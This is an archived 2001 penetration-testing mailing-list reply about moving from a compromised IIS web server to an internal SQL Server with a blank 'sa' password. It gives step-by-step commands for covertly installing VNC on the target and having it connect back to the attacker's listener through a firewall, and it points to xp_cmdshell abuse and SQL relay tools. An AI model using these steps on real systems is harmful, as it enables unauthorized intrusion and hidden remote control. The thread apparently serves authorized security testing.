Re: [PEN-TEST] Web Server to SQL Server

From: H D Moore (hdmat_private)
Date: Thu Apr 12 2001 - 20:54:00 PDT

Next message: Steve Skoronski: "[PEN-TEST] RPC enumeration"

Previous message: Chris Tobkin: "Re: [PEN-TEST] Web Server to SQL Server"
Next in thread: c0ncept: "Re: [PEN-TEST] Web Server to SQL Server"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

There are a few ways to go about this:

1. Upload a tool to the IIS box which runs a SQL query against the
database server.  You could try sqlexec.exe (packetstorm) or even create an
ASP script on the server which relays a request to the database server. If the
/msadc RDS component is available you can try using my sqlrds.pl tool to
relay a request to the server through that.  The sqlrds.pl script is available from
http://www.digitaloffense.net/csw/

2. Get a GUI interface on the IIS server.  Install VNC on the IIS server after
elevating your access with hk.exe or cmdasp.asp. You can run the VNC
server in outbound mode and run the client in listen mode, so that should
get you through the firewall.  To install VNC remotely:

a. Install VNC on a local machine, set a password and any options.
b. Open RegEdit, export the HKLM/Software/ORL key to a file.
c. Copy winvnc.exe, vnchooks.dll, and omnithread_rt.dll to the target's \winnt\system32 directory
d. Copy your exported registry file to the target, import with regedit <filename>.reg
e. Execute winvnc -install on the target system
d. Execute net start winvnc
f. Execute vncviewer -listen on the attacking system
g. Execute winvnc -connect <your ip> and enjoy your desktop ;)

3. Owning the SQL server.  With a blank "sa" account, this should be trivial. Just execute
the xp_cmdshell stored procedure and follow the above steps to get a VNC desktop.

For more info, check out my CanSecWest/core01 presentation, available online at
http://www.digitaloffense.net/csw/ or read the excellent material available from
http://www.sqlsecurity.com/

- -HD

Senior Security Analyst
Digital Defense Incorporated
http://www.digitaldefense.net/

On Wednesday 11 April 2001 10:52 pm, myrddin_eat_private wrote:
> Once I have done this, the only traffic into the internal network allowed
> from the IIS server will be on port 1433. The SQL server will have a blank
> 'sa' password. How would I then proceed to bust the SQL server? I know I
> can do this if I install Perl on the IIS server and place the needed tools
> on the box, but that requires GUI access to the IIS server (right?). Other
> than setting up a port redirector like FPipe, how would you go about this?
>
> Free, encrypted, secure Web-based email at www.hushmail.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQA/AwUBOtZ4WTwRvqMPEDLhEQImKgCfSCpzTLunnAc0jF9GhrkRCbwHJ9gAoIsH
Fy1y25z9JgJ7LvpLbLi6VrAu
=gcga
-----END PGP SIGNATURE-----

Next message: Steve Skoronski: "[PEN-TEST] RPC enumeration"
Previous message: Chris Tobkin: "Re: [PEN-TEST] Web Server to SQL Server"
Next in thread: c0ncept: "Re: [PEN-TEST] Web Server to SQL Server"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 09:18:06 PDT